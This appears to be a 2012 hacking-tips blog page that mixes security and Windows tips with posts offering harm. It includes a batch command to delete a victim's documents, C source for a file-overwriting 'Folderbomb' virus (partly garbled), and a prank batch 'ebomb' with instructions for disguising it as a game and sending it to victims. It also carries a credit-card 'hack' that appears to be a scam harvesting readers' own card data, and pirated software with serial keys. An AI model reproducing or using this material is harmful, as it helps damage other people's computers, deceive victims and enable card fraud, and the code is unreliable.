Friday, April 6, 2012

How to Secure your Gmail Account from Hackers...

How to Secure your Gmail Account from Hackers

All of us have our Email Accounts on GmailYahooHotmail etc.Phising and hacking are on the rise and many of us have already faced the situtaions when our email Id has been compromised.It is very difficult to estimate the loss which one undergoes once his email ID has been hacked.
Now you can add an extra layer of security in your Gmail Account.After enabling this feature you have to enter an addtional verification code (sent to your mobile) to login into your account.So,if somebody hacked your password even then he won’t be able to access your email account.

How to Secure Gmail Account:-

Capture11 How to Secure your Gmail Account from Hackers
  • Choose a verification method.By selecting Text message (SMS) or voice call you will recieve the verification code on you phone either as text message or as a call.
61 How to Secure your Gmail Account from Hackers
  • Enter the appropriate information about your country and Mobile Number.
126 How to Secure your Gmail Account from Hackers
  • Choose SMS text message or Voice call option according to your need. (I prefer SMS text message).
  • After giving your mobile number test your phone by clicking on the Send Code button.
133 How to Secure your Gmail Account from Hackers
  • Now you will receive a verification code on your given mobile number and type that code in the verification field and click on Verify button.
  • After verifying your number click on the Next button.
If you lost your mobile or your number is not available when you need it. For this you can save backup codes in to your computer.
  • Click on Next button again.
  • Here you will see 10 Backup verification codes. Choose Print codes or Save to text file option whatever you like but keep it safe and don’t lose it.
  • Check mark the box and click on Next button.
16 How to Secure your Gmail Account from Hackers
  • Here give your working alternative number. And click on Next button.
  • Now again click on the Next button again and then click on the Turn on 2-step verification button.
5 How to Secure your Gmail Account from Hackers
  • Click OK.
That’s it ! Now you have been added 2-step verification security to your Gmail account. Now whenever you will enter your password it will ask you to enter verification code without it you won’t be able to login to your Gmail Account.

SIMPLE VIRUS CODING

                      SIMPLE VIRUS CODING...

Run this on your own responsibility*/

VIRUS CODE-1

IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.


VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Secure Yourself from Hackers & Hijackers....

    Secure Yourself from Hackers & Hijackers

Hackers and Browser Hijacking is one area of theNet that affects everyone at some stage.
In addition to having third party utilities such as SpyBot, Anti Virus scanners and firewalls installed there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers.
Some of these tips require editing of the Registry so it is wise to either backup the registry and/or create a Restore Point.
1. Clearing the Page File at Shutdown


Windows 2000/XP paging file (Sometimes called the Swap File) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force windows to clear out this file.

In the registry navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1.

Note that when you do this, the system will take much longer to shut down: a system with a really big Page File (! Gig or more) may take a minute or two longer.

2. Disable the POSIX and OS/2 Subsystem.

Windows 2000 and XP come with little-documented subsystems it at allow compatibility with UNIX and OS/2 systems These rues systems are enabled by default but so rarely used that they are best off bring disabled completely to prevent possible service hijackings.

To disable these subsystems, open the registry and navigate to HKEY LOCAL MACHINESYSTEMCurrentControlSetControlSession ManagerSubSystems. Delete the subkeys Os2 and Posix. then reboot.

3. Never leave default passwords blank.

On installation, Windows 2000 sets up an Administrator account with total
system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.

4. Disable the Guest account
 
 Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account.





5. Install Windows In a different directory.
 
 Windows usually installs itself in the WINDOWS directory. Windows NT 4 0 and 2000 Will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit those folders files. To defeat this install Windows to another directory when you're setting it up - you can specify the name of the directory during setup. WINDIR is okay; so some people use WNDWS - A few (not that many) programs may not install properly if you install Windows to another folder but t hey are very few and they are far between

6. Fake out hackers with a dummy Administrator account
 
 Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. It you never bothered to put a password on that account, say your prayers.

Rather than be a sucker to a hacker, put a password on the Administrator account it you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would -be break-ins.

You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap in. Right-click on My Computer, select Manager, open the Local Users and Groups subtree, look in the Users folder and right-click on any name to rename it. To add a new user, right-click on the containing folder and select New User. Finally, to disable an account, double-click it, check the Account is disabled box and click OK.

Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to setup such software. The original Administrator account is configured with a security ID that must continue to be present in the system.

7. Set the Hosts file to read-only to prevent name hijacking.
 
This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly-visited sites into it, speeding things up considerably.

Unfortunately hijackers and hackers also love to put their own information into it - redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is local host which is set 1770.0.1. This refers to the local machine and if this entry is damaged the computer can behave very unpredictably.

To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %Systemroot%system32driversetc, right-click on HOSTS, select Properties check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done.

8. Turn off unneeded Services
 
 Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.
A good resource and instruction on which of these services can be disabled go to /http://www.blkviper.com/WinXP/




 
9. Disallow changes to IE settings through IE
 
 This is another anti hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with setting by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel.

Open the Registry and browse to HKEY_CURRENT_USER SoftwarePoliciesMicrosoftInternet ExplorerRestrictions. Create or edit a new DWORD value named NoBrowserUptions and set it to 1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting.

You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY.CURRENT USERSoftwarePolicies MicrosoftInternet ExploreControl Panel and add or edit a DWORD, Homepage and set it to 1.

10. Disable simple File Shares.
 
In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it
抯 a little too easy to share out a file across your LAN (or the NET at large). To turn it off, go m My Computer, click Tools, Folder Option and the View tab, and uncheck Use Simple file sharing (Recommended). Click OK. When you do this you can access the Security tab in the Properties window for all folders; set permissions for folders; and take ownership of objects (but not in XP Home)

Improve Windows XP Shutdown Speed

Improve Windows XP Shutdown Speed
              This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.
Go to Start then select Run
Type 'Regedit' and click ok
Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
 
Now find 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

JAVA COMPLETE REFERENCE

JAVA COMPLETE REFERENCE 

java complete reference ..........clickhere

 

DBMS ---RAMA KRISHNA

DBMS RAGHU RAMA KRISHNA GUIDE.......................

Folder Lock 7.0.3 with Serial key Free Download

Folder Lock 7.0.3 with Serial key Free Download...!!!

Lock, Encrypt, Backup your files by the latest version Folder Lock 7.0.3. Folder Lock is a full suite solution for all your data security needs. It lets you keep your personal files protected in a variety of ways, in both PC and portable drives.
With Folder Lock 7, you can now not only encrypt your data, but also make backups of that data to your exclusive online storage account. The subscription service, when used in conjunction with Folder Lock 7 Encryption feature, offers the greater benefits of a simultaneous, automatic and real-time encryption and backup, providing both secure backup & recovery redundancy and the fastest data protection without the high cost.

Some Cool features of Folder Lock 7.0.3 :
 
1. Fastest Encryption: With Folder Lock you can now encrypt your files faster than ever. The program
    creates Lockers, without taking up much space and grow as you dump files in it. Lockers are encrypted,
    re sizable, portable and ready for backup.
2. Automatic Backup: Folder Lock 7 allows you to optionally backup all files and folders you keep in your
    encrypted Lockers automatically while you continue to modify or access your encrypted files.
3. Additional Security: Users can now achieve true portable security, application level password security,
    activate stealth options, shred files, make wallets, clean history, auto protect the application and all its
    files, use virtual keyboard to type passwords to prevent key logging of any kind and can prevent hacking
    and incorrect password attempts.
4. True Ease of Use: Folder Lock 7 leverages NewSoftware's highly regarded graphical user interface.
    Existing Folder Lock users will be immediately productive: it's the same great console they already know
    and love. New users will find Folder Lock 7 remarkably easy to configure and use. Even relative novices
    can use all features of the product without going through all the jargon and how tos.

You can follow bellow Screenshots for better understanding:

   Encrypt Files and Create Lockers

Lock and Hide files, folders or drives
Encrypt Files and Create Lockers
Password Protect USB drives and CDs
For Free Download Folder Lock 7.0.3 with Serial key Click Here
If you have any question regarding Folder Lock 7.0.3 with Serial key Free Download,

 

IDM 6.07 Build 15 Full Version Free Download [Mediafire]

IDM 6.07 Build 15 Full Version Free Download [Mediafire]


At the previous post I have posted idm 6.07 build 14, but will now discuss the newer version that is idm 6.07 build 15 full version. Internet Download Manager a few days ago to update itself into Internet Download Manager 6.07 Build 15, where in this version of IDM make improvements and integration with firefox bugs 9.




What's new in Internet Download Manager 6.07 Build 15:
  • Added support for Firefox 9
  • Added support for new domain names of filesonic site
  • Added digest authorization for web sites
  • Fixed bugs
Download Link:
Password =>> www.dytoshare.us

Internet Download Manager 6.07 Build 15 Full Version [Mediafire]

 

Ebomb a virus for fun ....!!!!!!!

Ebomb a virus for fun....!!!!

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox


and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)

you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "
www.ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "
ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad



and then simply save it as "anyname.bat"

How To Hack Valid Credit Card Numbers With CVV Numbers

How To Hack Valid Credit Card Numbers With CVV Numbers....

Before going shopping online, every customer has to register online with his/her credit card information and they'll leave their emails too so that those shopping websites will confirm their registration. For those online shoppers who used yahoo emails, their credit card info is automatically stored in the yahoo server when the companies send to them confirmation emails. However, there is a BIG bug in the server that those people's credit card information can be retrieved by any random email user who has a VALID credit card. To simplify this, here is how it works:

Send an Email to confuse a yahoo server mailbot, so that it will return to YOUR EMAIL with complete information on people's credit card information stored in the server in the last 72 hours. This is how you will get people's VALID credit card information. Now you have to do exactly the same as follows:

EDIT: removed redundant information

expiration date (This is line 35, has to be LOWER CASE letters) 0000000000000 (This is line 36, put a zero under each character, number, letter, hyphen, etc)

E-mail(This is line 47, has to be LOWER CASE letters) 0000000000000 (This is line 48, put a zero under each character, number, letter, hyphen, etc)

252ads (This is line 51)

Return-Path: (This is line 54, type in your email between ) s_

You have to make sure you do EXACTLY as what is said above and the credit card info above the 0000 are absolutely CORRECT/VALID. Valid, meaning one that is registered in your major credit card database.

For those who like to play it safe, thinking this is too good to be true. Get this; the card number you use as bait can be one that has been discontinued (canceled). However, it cannot be expired and the card information must be correct. If it is expired and the information incorrect, you will simply get back No data retrieved & #8221; as a reply. And you thought those canceled credit cards you keep in your wallet, just because they're pretty, were useless.

Here is a sample email: (CAUTION! This is only example, and the card is INVALID, to get the whole thing to work, you MUST use a VALID credit card as bait.

Send to: <removed>

Subject: accntopp-cc-E52488

Email body:

boundary='0-86226711-106343'

Content-Type: text/plain; charset=us-ascii

4013993145565451
0000000000000000

jesse d banks
00000000000

523
000

2537 Stillwell rd.,des moines
00000000000000000000000

ia, usa, 50567
0000000000

901-834-4183
000000000000

visa
0000

03/2006
0000000

<email removed>
000000000000000000000

252ads

Return-Path

Once again, you have to make sure that you DO NOT COPY THE SAMPLE EMAIL ABOVE, because it will NOT work!!! It is there to help you set it up. Instead, you MUST provide A VALID AND CORRECT CARD, otherwise you will NOT get the information you want.


Change Icon For My Computer, Recycle Bin, Others...

Change Icon For My Computer, Recycle Bin, Others


Do you have icons for My Computer, My Documents, My Network Places, and/or Internet Explorer on your Windows XP desktop? And if so, would you like to change how the icons look?

1. Right-click an empty area of the desktop and choose "Properties".

2. When the "Display Properties" multi-tabbed dialog box appears, click the "Desktop" tab.

3. Click the "Customize Desktop" button.

4. A "Desktop Items" dialog box will appear. Make sure the "General" tab is selected.

5. Click on an icon to change:

* My Computer
* My Documents
* My Network Places
* Recycle Bin (full)
* Recycle Bin (empty)

6. Click "Change Icon".

7. If you like one of the available icons, choose one and click "OK". Or, you can browse your system for more icons including those you may have downloaded from the Internet. You can also use the icons embedded in executable files, DLLs, etc.
 

Give Ur Gmail A Freaking New Look .....!!!!

Give Ur Gmail A Freaking New Look... !!!!

GMail’s looks are still the same after all these years and if you are one of those who have got bored with those simple and no-nonsense looks, here is an open source add-on which can add themes and jazz-up the Google’s email service, provided you have Mozilla Firefox installed as your browser!


Canadian firm Globex Designs has been working on an open source project called Gmail Redesigned to revive the looks of Gmail while using Firefox. They’ve come up with a stylish add-on for Gecko browsers like Firefox and Flock to help you change the way Gmail looks.


Gmail Redesigned is designed to work with the newer and older versions of Gmail and designed to work with any language currently supported by Google.




If this Gmail make-over idea interests you, here’s a quick guide to help you get started with this nifty add-on to your Gecko browser. Before you get going, do note that you must use Firefox 2.0+ or Flock 1.0+. Although the extension can be installed on Firefox 2.0 and Flock 1.0, it’s recommended that you use the latest versions.




To Install


1. Select the type of style to download above: Standard, Embedded or Developer
2. Click on Install
3. Right-click the Stylish icon in the bottom right corner of the browser
4. Click on “Add File to Stylish”


To Update


1. Right-click the Stylish icon in the bottom right corner of the browser
2. Click on “Manage Styles”
3. Click on “Find Updates”
4. If there is an update for the Gmail Redesigned style, it will appear in the list





To know more about Gmail Redesigned, visit www.globexdesigns.com

What Is The Difference Between A Virus, Trojan, And Worm...?

What Is The Difference Between A Virus, Trojan, And Worm?



Basically, they all fall under the generally category of "viruses". However, there are a few distinctions.

Virus - Technically, a virus infects another file (attaches or inserts itself into it). They usually infect program files or MS Office documents. From there, it can replicate, do damage, etc. Unlike a worm, these do not function as a stand alone (except possibly to infect a given file).

Worm - This is almost identical to a "true virus", except that it lives on its own and generally doesn't infect other files (although it can replace them). Usually, these copy themselves using e-mail, networks, disks, etc. Again, these are very close to a true virus, and can do the same kind of damage.

Trojan Horse - This type of program doesn't copy itself but does do damage to your computer. These types of programs rely on people to pass them around and to run them. They do not e-mail themselves. The idea is to make the program look like it's something harmless, like a screen saver or joke, so it gets sent around.

That's the crash course on virus types. Bottom line, you don't want any of the little nastys on your computer! 

How to Fix Broken .ISO and .IMG File Associations in Windows 7

How to Fix Broken .ISO and .IMG File Associations in Windows 7

 
       If your .ISO and .IMG files are showing up as unknown files, you can reset their file type associations using Default Programs. Windows 7 includes the Windows Disc Image Burner, the default handler for .ISO/.IMG files allows you to burn a CD or DVD from an ISO disc image file.
 

.ISO file showing up as elby.VCDMount.1 file (occurred after uninstalling Virtual CloneDrive in a PC.)

Resetting Windows Disk Image Burner as the Default

1. Click Start, Default Programs
2. Click Set your default programs
3. Select Windows Disk Image Burner
4. Click Set this program as default, and click OK.

Top 10 computer mouse tips everyone should know

Top 10 computer mouse tips everyone should know

Most computer users don't take full advantage of the computer Mouse. Below are computer mouse tips and secrets that help you get the full potential of your computer mouse and increase your overall productivity while on the computer.

Shift key and mouse click

Many text editors and programs allow you to highlight all or portions of text using the Shift key and the mouse. For example, place the cursor at the beginning of a paragraph, hold down the Shift key and click at the end of the paragraph to highlight the full paragraph.

Take full advantage of the scroll wheel

Today, everyone is fully aware of a mouse wheels ability to scroll up and down on a page. However, this wheel can also do so much more, as shown below.
  • The mouse wheel is not just a wheel, it can also be used as a button. Pressing down on the wheel will act like a third mouse button. This can be used to open a web page in a tab by clicking the wheel on any link and can also be used to close a tab by clicking the wheel on any open tab.
  • Quickly Zoom in and Out on a web page, word document, excel spreadsheet, etc. by holding down the Ctrl key and scrolling up to zoom in and down to zoom out.
  • Move forward and backwards while browsing the Internet by holding down the Shift key and scrolling up and down. Scrolling down goes back and scrolling up goes forward.
Select with double and triple click

Any word can be easily selected by double-clicking the word. If you want to highlight the whole paragraph, click the mouse button three times on any text in the paragraph.

Use the right-click

Take full advantage of the right-click any time you highlight text or wish to view the properties of an object. For example, if you highlight a file or text, you can right-click that highlighted item copy it and then right-click anywhere else to paste it.
Tip: If you right-click on any file or text and drag it while continuing to hold the right button, when you let go you will be given the option to move or copy that file or text. This saves you the extra step of having to right-click where you want to paste the item.
Tip: While in a browser pressing and holding Ctrl while clicking on any link will open that link in a new tab.

Ctrl key and mouse click or highlight

While holding down the Ctrl key you can left-click to select multiple objects or highlight multiple sections of text. For example, in Microsoft Windows you could hold down the Ctrl key and click to select multiple files at once. If you wanted to highlight different parts of a paragraph or web page, you could also hold down the Ctrl key and select each section you wanted to copy.
Tip: Mozilla Firefox users can also hold down the Ctrl key and individually click on each cell in a table they wish to copy or drag their mouse down a row to select just that row or text without selecting any of the other text in that table.

Use the mouse side buttons

Many new computer mice have buttons on the side of the mouse. These buttons can be programmed to do anything, however, by default the left-thumb button can be used to go back on a web page. This makes browsing the Internet more enjoyable since you do not need to move the mouse cursor to the browser back arrow button in order to go back a page.

Use the Windows Snap To feature

Take full advantage of the Windows mouse Snap To feature, which will automatically move your mouse to buttons that appear in a dialog box. For example, if you delete a file or close a window you may get a prompt asking you if you are sure you want to perform the task. With the Snap To feature enabled, the mouse cursor automatically moves to the Ok button, so all you will have to do is click the mouse button if you agree. This saves you the time of having to move the mouse cursor over to the Ok button and then click Ok. To enable this feature open the Mouse properties under the Windows Control Panel and check the Snap To check box under the Pointer Options tab.
Tip: While changing this feature we also suggest looking at other available options in the Mouse settings. For example, increasing the Motion speed can also help increase your productivity while using the mouse.

Manage the open window with the mouse

Double-click the top title bar of any window to maximize a window or if it is already maximized resize it to a window. You can also double-click the icon for the window in the top-left corner of the window to close that window.

Move the mouse with your keyboard

Instead of using the mouse that came with your computer you can also enable Windows to use the number pad as a mouse.

Customize your mouse

Finally, if you have a mouse with more than two buttons, installing the included mouse software will allow you to customize the mouse even more. For example, if you don't use the side buttons to move back and forth in a web page change it to something you do more often, such as switching between open windows or opening the calculator.